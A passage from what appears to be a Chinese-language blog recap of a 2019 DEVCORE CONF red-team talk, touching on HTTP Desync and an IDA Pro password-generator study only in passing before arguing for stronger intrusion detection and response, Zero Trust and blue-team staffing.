會追新技術這件事情,似乎是資安圈的標配,我們的世界不只有 OWASP TOP 10。更現實的說法是,如果只靠這麼一點知識,在紅隊演練能發揮的效果其實並不大。分享一下我看到成員們的樣子,對於他們來說,看新技術是每天的習慣,如果有資安研討會投影片釋出,會追。新技術裡有興趣的,會動手玩,甚至寫成工具,我們很多內部工具都是這樣默默補強的。還有一點,看新技術最終目的就是要活用,拿新技術解決舊問題,往往有機會發現一些突破方式。例如我們在今年八月 BlackHat 研討會看到了 HTTP Desync 的攻擊方式,回國之後馬上就把這個知識用在當時的專案上,讓我們多了一些攻擊面向!(這個手法挺有趣的,在我們污染伺服器後,隨機一個人瀏覽客戶網頁就會執行我們的 JavaScript,不需要什麼特殊條件,有興趣可以研究一下:p )

相信…以及堅持

最後一點,我想分享的是:在研究或者測試的過程當中,有時候會花費很多時間卻沒有成果,但是如果你評估是有機會,那就相信自己,花時間做下去吧! 我們有一個花費一個月的例子,是之前破解 IDA Pro 偽隨機數的研究,這個事件意外在 binary 圈很有名,甚至還有人寫成事件懶人包。這個研究是在探討如果我們沒有安裝密碼,有機會安裝 IDA PRO 嗎?結果最後我們想辦法逆推出了 IDA 密碼產生器的算法,知道偽隨機數使用了哪些字元,和它的正確排序。這件事情的難度已經不只在技術上,而在於要猜出偽隨機數使用的字元集順序,還要同時猜出對方使用的演算法(至少有88種)。而且我們每驗證一種排列組合,就會花半天時間和 100GB 的空間,累積成本滿高的。但我們根據經驗相信這是有機會成功的,並且投注資源堅持下去,最後有了很不錯的成果。

這裡不是在鼓勵一意孤行,而是一種心理素質:是在面臨卡關的時候,有足夠的判斷力,方向錯誤能果斷放棄,如果方向正確要有堅持下去的勇氣。

資安防護趨勢與紅隊的下一步

文章的最後一部分要談的是紅隊演練的未來,也是這篇文章的重點,未來,我們希望可以解決什麼問題?

做為紅隊演練的領導廠商,從 2017 年演練到現在我們進入台灣企業內網的成功率是 100%。我們在超過六成的演練案中拿到 AD 管理權限,這還不含那些不是用 AD 來管理的企業。我們發現進入內網後,通常不會有什麼阻礙,就好像變成內部員工,打了聲招呼就可以進機房。想要提醒大家的是:對頂尖攻擊團隊而言,進入企業內網的難度並不高。如果碰上頂尖的駭客,或是一個 0day,企業準備好了嗎?這就是現階段我們所發現的問題!

在說到抵禦攻擊通常會有三個面向,分別是「預防」、「偵測」和「回應」。一般而言企業在「預防」這部份做的比較完善,對於已知的弱點都有比較高的掌握度。今天普遍的問題在「偵測」和「回應」上,企業能不能發現有人在對你進行攻擊?或是知道被攻擊後有沒有能力即時回應並且根絕源頭?這兩件事情做得相對不好的原因並不是企業沒有投入資源在上面,而是對於企業來說太難驗證,很難有個標準去確定目前的機制有沒有效或是買了設備有沒有作用,就算有藍隊通常也沒有建立完善的應對 SOP,畢竟駭客入侵不會是天天發生的事情。

所以,我們希望企業能從紅隊演練中,訓練對攻擊事件的偵測和反應能力。或是說,紅隊演練的本質就是在真實的演練,透過攻防幫助企業了解自己的弱項。過去台灣的紅隊服務都會強調在找出整個企業的弱點,找出漏洞固然重要,但碰到像我們一樣很常找到 0-day 的組織,有偵測和回應能力才是最後能救你一命的硬技能。換個角度來看,目前世界上最完整的攻擊戰略和技術手法列表是 MITRE ATT&CK Framework,一個對企業有傷害的攻擊行動通常會是很多個攻擊手法所組成的攻擊鏈,而在這個 Framework 中,找到起始弱點這件事情僅佔了整個攻擊鏈不到一成,企業如果能夠投注在其他九成手法的偵測能力上並阻斷其中任一環節,就有機會讓整個攻擊行動失敗而保護到資產。

要說的是,我們紅隊演練除了找出企業漏洞能力頂尖之外,也累積了很豐富的內網滲透經驗及技巧,我們很樂意透過演練協助企業加強真實的偵測和回應能力。漸漸的,未來紅隊會慢慢著重在和藍隊的攻防演練。會強調擬定戰略,讓企業了解自己對哪些攻擊的防禦能力比較弱,進而去改善。未來的紅隊也更需要強調與防禦機制交手的經驗,了解防禦的極限,才有辦法找到設備設定不全或是涵蓋率不足的盲點。

最後我們也有些規劃建議給對資安防禦比較成熟的企業如下,逐步落實可以將資安體質提昇一個層次。(至少從我們的經驗來看,有這些概念的企業都是特別難攻擊達成目標的)

  • 如果外網安全已投資多年,開始思考「如果駭客已經在內網」的防禦策略
  • 盤點出最不可以被洩漏的重要資料,從這些地方開始奉行 Zero Trust 概念
  • 企業內部需要有專職資安人員編制(藍隊)
  • 透過與有經驗的紅隊合作,全盤檢視防禦盲點

後記

研討會內容到這邊就結束了。寫在最後的最後,是充滿著感謝。其實無論滲透測試還是紅隊演練,在一開始都不是人人可以接受的,而測試的價值也不是我們說了算。一路走來,漸漸漸漸感受到開始有人相信我們,從早期比較多測試時與工程師和網管人員的對立,到近期越來越多 open mind、就是想找出問題的客戶,是滿大的對比。非常感謝他們的信任,也因為這樣的互信,我們得以節省時間完成更棒的產出。滿樂見台灣資訊產業是這樣正向面對問題,漏洞存在就是存在,不會因為視而不見而真的不見,意識到有問題解決了就好。所以我在演講最後留下這樣一句:『紅隊演練的精髓不是在告訴你有多脆弱,在於真正壞人闖入時你可以獨當一面擋下』,希望越來越多人能正面對待問題,同時也傳遞我們想要做到的價值。

2019 DEVCORE CONF,謝謝過去合作的朋友們參與讓 DEVCORE 紅隊得以進化,希望下一步也能有你,我們明年見 :)

❌
❌